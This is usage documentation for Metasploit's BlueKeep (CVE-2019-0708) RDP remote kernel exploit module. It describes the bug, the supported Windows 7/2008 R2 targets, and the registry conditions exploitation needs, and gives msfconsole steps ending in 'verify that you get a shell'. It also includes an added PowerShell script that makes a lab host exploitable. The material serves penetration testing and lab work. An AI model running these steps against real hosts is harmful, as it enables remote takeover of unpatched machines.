CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
The RDP `termdd.sys` driver improperly handles binds to the internal-only channel `MS_T120`, allowing a malformed Disconnect Provider Indication message to cause a use-after-free. With a controllable data/size remote nonpaged pool spray, an indirect call gadget of the freed channel is used to achieve arbitrary code execution.
Windows 7 SP1 and Windows Server 2008 R2 are the only currently supported targets. Windows 7 SP1 should be exploitable in its default configuration, assuming your target selection is correctly matched to the system's memory layout.

`HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\fDisableCam` needs to be set to 0 for exploitation to succeed against Windows Server 2008 R2. This value controls client audio redirection, which server SKUs disable by default, so this is a non-standard configuration for normal servers; if the value is not set to 0, the target will crash instead of being exploited.

If the target is crashing regardless, you will likely need to determine the non-paged pool base in kernel memory and set it as the `GROOMBASE` option.
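The following PowerShell script is an added example for preparing a lab target; it is not part of the Metasploit module or its documentation. Run it as Administrator on the Windows 7 SP1 or Server 2008 R2 box before testing: it checks that the build is the one the module supports, enables Remote Desktop if it is off (the Windows 7 default), and sets `fDisableCam` to 0 under `RDP-Tcp` as the text above requires. The registry paths and value names are the standard Terminal Server ones; the firewall rule group name is the built-in "remote desktop" group.

```powershell
# Added example, not the module's own code. Run elevated on the target VM.
$tsKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$rdpTcp = Join-Path $tsKey 'WinStations\RDP-Tcp'

# 1. Supported build check: Windows 7 SP1 and Server 2008 R2 both report 6.1.7601,
#    and the module only has x64 targets for them.
$os = Get-WmiObject Win32_OperatingSystem
if ($os.Version -ne '6.1.7601' -or $os.OSArchitecture -ne '64-bit') {
    Write-Warning "Build $($os.Version) $($os.OSArchitecture) is not a supported target (need 6.1.7601 x64)"
}

# 2. RDP must accept connections. fDenyTSConnections=1 (the Windows 7 client default)
#    means Remote Desktop is off, so nothing will listen on 3389.
$deny = (Get-ItemProperty -Path $tsKey -Name fDenyTSConnections).fDenyTSConnections
if ($deny -ne 0) {
    Set-ItemProperty -Path $tsKey -Name fDenyTSConnections -Value 0 -Type DWord
    netsh advfirewall firewall set rule group="remote desktop" new enable=Yes | Out-Null
    Write-Host 'Enabled Remote Desktop (fDenyTSConnections=0) and its firewall rule group'
}

# 3. fDisableCam must be 0 (client audio redirection allowed). Server 2008 R2 ships
#    with it set to 1, and with that setting the module crashes the target instead
#    of exploiting it. A missing value is treated the same as a non-zero one.
$cam = Get-ItemProperty -Path $rdpTcp -Name fDisableCam -ErrorAction SilentlyContinue
if ($null -eq $cam -or $cam.fDisableCam -ne 0) {
    Set-ItemProperty -Path $rdpTcp -Name fDisableCam -Value 0 -Type DWord
    Write-Host 'Set fDisableCam=0 under RDP-Tcp'
}

# 4. Restart the RDP service so it picks up the new WinStation settings.
#    -Force is needed because UmRdpService depends on TermService.
Restart-Service TermService -Force

# Show the final state for the record before attacking from msfconsole.
Get-ItemProperty -Path $rdpTcp -Name fDisableCam | Select-Object fDisableCam
Get-ItemProperty -Path $tsKey  -Name fDenyTSConnections | Select-Object fDenyTSConnections
```

After the script reports `fDisableCam : 0` and `fDenyTSConnections : 0`, the host is in the state the module expects; the remaining crash cause to rule out is a `TARGET` choice that does not match the host's pool layout, which is where `GROOMBASE` comes in.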
This exploit module currently targets the following Windows systems, with separate target entries tuned for several virtualized and physical hosts:

- Windows 7 SP1 x64
- Windows 2008 R2 x64

XP and 2003 are currently not supported. See the available targets by running the `show targets` command.
- Start `msfconsole`
- `use exploit/windows/rdp/cve_2019_0708_bluekeep_rce`
- `set RHOSTS` to a Windows 7 SP1 / 2008 R2 x64 host
- `set TARGET` based on the target host's characteristics (virtualization platform or physical hardware, which determine the memory layout)
- `set PAYLOAD`
- `exploit`
- Verify that you get a shell
- Verify that the target does not crash